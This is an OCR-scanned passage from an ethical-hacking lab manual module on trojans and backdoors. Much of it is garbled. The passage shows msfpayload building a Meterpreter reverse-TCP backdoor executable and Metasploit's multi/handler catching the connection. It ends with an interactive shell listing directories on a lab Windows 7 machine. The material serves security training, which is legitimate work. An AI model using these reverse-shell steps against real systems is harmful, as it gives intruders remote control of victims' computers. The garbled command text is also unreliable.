« 251 ]■-- • payloads
■
‫־‬
28 encoders
8 nops
1st > msfpayload windows/iieterpreter/reverse tcp LHOST-10.0.0 6 X > Desktop Backdoor.exe
[* ] exec: nsfpayload windoirfs/meterpreter/reversetcp LHOST=10.0.0.6 X > Desktop Backdoor.exe
sh: Desktop: is a directory
msf > msfpayload windows/neterpreter/reversetcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe
l ‫ ״‬J exec: nsfpayload windoirfs/meTerpreter/reverse tcp LHO^I‫ ־‬lft.ft.-O^TX 0‫־*י‬e1^‫״‬
tt’6J»/Backdoor.exe

1 11

Created by msfpayload < ttp ://*w .n etasp lo t.co ) .
h
Payload: windows/neterpreter/reversetcp
Length: 290
Options: { -LH0ST‫} ־6 .0 .0 .01*<=״‬
a k l > use e x p lo it/ m u lti/ h a n d le r
r s f e x p l o i t ( h a n c le r ) > s e t paylo ad w in d o w s/ n e te rp rete r/ re ve rse tcp
payload => w in d o w s / m e te rp re te r/ re v e rs e tc p
aisf e x p l o i t ( h a n d le r) > s e t Ih o s t 1 0 .0 .8 .6

^

I host = 10.0.0.6
>

_

lil
e x p l o i t ( h a n d le r) > e x p lo it -J -£|
[ * ] E x p lo it ^ ^ n n ir ^ i^ f c a ^ ii^ o u r ^ ijo W / T ■

[* ]^ ^ r t^ t a f e v e r ‫ «ל‬randier of! 18.0.9.6:444}

l3 *‫ ־‬Starting the pjtfytoad hsrdier^rr
J i
■ni sfl

______________

Lf cl L is.

e x p lo itt ( h an d le r ) > [ ‫ ] ״‬Send ing S t J^ e (751121 b y te s ) to 1 0 .0 .0 .5
p l o i ( h a n d le r)
[• !
s B c (751128

!]‫ ־‬J In te rp re te r session 1 opened (10.C 6.6:4444 -> 10.0.0.5:49458) at ,1 2012-19-23 !?‫♦ 25175:־‬
0530 |

l& T o in te ra c t
w ith th e availab le
session, you can
use sessions -i
<session id>

FIGURE 11.16: Exploit result of windows 7 machine
21. T o in teract w ith the available session, type the com m and s e s s io n s -i 1
and press E n te r

FIGURE 11.17: creating the session
22. E n te r the com m and s h e ll, and press Enter.



| File
<n

0

Media

(•) ®

Clipboard

o

11

V!*w

Help

»

1►

Applications !,laccs system
^
/

a

n
/

□

BackTrack on W1N-D39MRSHL9E4 - Virtual Machine Connection
Action

‫ך‬
*

r .

1


d

1^

RJC OCt 23, 3:13 PM

x *!terminal

File Edit view ifefmmal Help

Backc Created by m sfpayload ( h ttp ://w w w .n e ta sp lo 1 t.c o ■ >.
Pay lo a d : w in d o w s/ n e te rp rete r/ re ve rse tep
Length: 290
O p tions: CLHOST* 10. 0. 0. 6“ <■‫} "־‬
n k l > use e x p lo it/ m u lti/ h a n d le r
msf e x p l o i t ( h a n d le r) > s et paylo ad w in d o w s / n e te r p r e te r / re v e r s e tc p
payload *> w in d o w s / m e te rp re te r/ re v e rs e tc p
«1s f e x p l o i t ( h a n d le r) > s e t !h o s t 1 6 .6 .8 .6
I host 1 0 .0 .0 .6 <‫־‬
B i l e x p l o i t ( h a n d le r) > e x p lo it -j -2
[ * J E x p lo it running as background job .
[*1 S t a r t e d re v e rs e h and ler on 16.6 .6 .6 :4 44 4
[ * j S t a r t in g th e payload h a n d le r . ..
I l i l e x p l o i t ( h a n d le r) > [ * ] Send ing s tag e (752128 b y te s ) to 1 6 .0 .6 .5
[ * ] H e te r p r e te r s e s s io n 1 opened (1 6.6 .0 .6 :4 4 4 4 -> 16.6 .0 .5 :4 94 5 8) a t 2612-10n sf e x p l o i t ( h a n d le r) > s es s io n s * i 1
[ * ] S t a r t in g in t e r a c t io n w ith 1 . . .

c!«JS<1V1‫״‬I J Q

L |

M ic r o s o ft Windows T v e / s i o i f i f n . 76&Tj
C op yrigh t ( c ) 2609 M ic r o s o ft C o rp o ra tio n .

L I Q L IV
Al

r ig h t s res e rv ed ,

c :usersAiH nlnpesktop>|

FIGURE 11.18: Type the shell command
23. T ype the d ir com m and and press E n te r I t shows all the directories
present o n the v ic tim m achine (W indow s 7).
File

Action

Media

Clipboard

View

11' r ’
-°

Help

<010 ® @e 111►fe 5
1
/
.. /

a

x
y

cj

x Term inal

File Edit view lerm inal Help

Backc
»1s f e x p l o i t ( h a n d le r) > s e s s io n s - i 1
[- ] I n v a li d s e s s io n id
n sf e x p l o i t ( h a n d le r) > s e s s io n s ■i 2
[ * ] s t a r t in g in t e r a c t io n w ith 2 . . .
n e t e rp r e t e r > s h e ll
Process 2546 c re a te d .
Channel 1 c r e a te d .
M ic r o s o ft windows [v e r s io n 6.1.76011
C op yrigh t ( c ) 2609 M ic r o s o ft C o rp o ra tio n .

A l l rig h t s rese rved .

C : UsersAdwinDesktop?f a i f I
d ir

volum in drive c has no label.
e
Volume S e r i a l Nunber i s 6868-71F6

Oirectory of C:UsersAdninDesktop
10/23/2012

02:56

<0IR>

I
|

a

.

ftp s Ljsis
2

O ir (s )

56.679,985.152 b y t e s lfr e e

C :UsersAdrn1 nDesktop>§_________________________________________________

FIGURE 11.19: check die directories of windows 7

L a b A n a ly s is
Analyze and docum ent die results related to die lab exercise. G ive your opinion on
yo ur target’s security posture and exposure dirough public and free inform ation.



PLEASE T A L K TO YOUR IN S T R U C T O R IF YOU H A V E Q U E S T IO N S
R E L A T E D TO T H IS LAB.

T o o l/U tility
M e ta s p lo it

In fo r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d
O u tp u t:
H a ck the W in d o w s 7 m achine directories

In te r n e t C o n n e c tio n R e q u ire d
□ Y es

0 No

P la tfo r m S u p p o rte d
0 C la s s ro o m


0 iLabs

A l Rights Reserved. Reproduction is Stricdy Prohibited.

Ceh v8 labs module 06 trojans and backdoors

More Related Content

What's hot (18)

Viewers also liked (18)

Similar to Ceh v8 labs module 06 trojans and backdoors (20)

Ceh v8 labs module 06 trojans and backdoors